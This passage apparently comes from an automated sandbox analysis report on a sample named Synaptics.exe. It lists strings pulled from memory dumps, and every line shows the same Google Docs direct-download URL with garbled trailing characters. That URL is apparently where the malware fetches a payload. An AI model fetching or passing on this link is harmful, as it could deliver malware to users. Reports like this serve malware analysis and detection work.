                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000071F6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2759091660.000000000EF58000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005A7E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1613364424.0000000005A82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl%E
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl4
                              Source: Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlI
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle
                              Source: Synaptics.exe, 00000003.00000002.2445635497.000000000077E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle.co
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle2
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadliR
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlit
                              Source: Synaptics.exe, 00000003.00000002.2445635497.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.000000000728C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm.
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm.vn
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm8
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmPL
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmY
                              Source: Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmargi
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmze
                              Source: Synaptics.exe, 00000003.00000002.2445635497.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005AAA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005AB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.bK
                              Source: Synaptics.exe, 00000003.00000002.2445635497.000000000077E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.com
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn7
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnE
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnX
                              Source: Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnc
                              Source: Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadne.cn
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnoO
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000071F6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1610949341.0000000007203000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnx
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado;
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoSN
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoa
                              Source: Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadog
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogF
                              Source: Synaptics.exe, 00000003.00000002.2445635497.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogle
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoo
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoo&
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogle
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadou
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadouble/
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000071F6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2759091660.000000000EF58000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005A7E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.000000000728C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1613364424.0000000005A82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp8
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpY
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadps$
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpx
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005B02000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000072E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
                              Source: Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqF
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqTp
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr;
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrG
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrSs
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadran
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadre
                              Source: Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrepea
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadri
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrl(//
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B02000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrvice
                              Source: Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrxY
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005A7E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1613364424.0000000005A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads%J
                              Source: Synaptics.exe, 00000003.00000002.2445635497.00000000007BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsA
                              Source: Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsI
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadse
                              Source: Synaptics.exe, 00000003.00000002.2445635497.000000000077E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadserv
                              Source: Synaptics.exe, 00000003.00000002.2759091660.000000000EF58000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005A7E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005B02000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1613364424.0000000005A82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt$M
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt1
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtd
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadthis
                              Source: Synaptics.exe, 00000003.00000002.2445635497.000000000077E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtion-
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadts
                              Source: Synaptics.exe, 00000003.00000002.2445635497.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.000000000728C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu7
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduX
                              Source: Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadund:u
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduot
                              Source: Synaptics.exe, 00000003.00000002.2445635497.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005AAA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005AB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv6
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvH
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvW
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvi0
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvn
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvnw
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw:
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwRv
                              Source: Synaptics.exe, 00000003.00000002.2759091660.000000000EF58000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005A7E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2698107267.000000000BBFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.000000000728C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1613364424.0000000005A82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx7
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxX
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxoy
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady;
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadySx
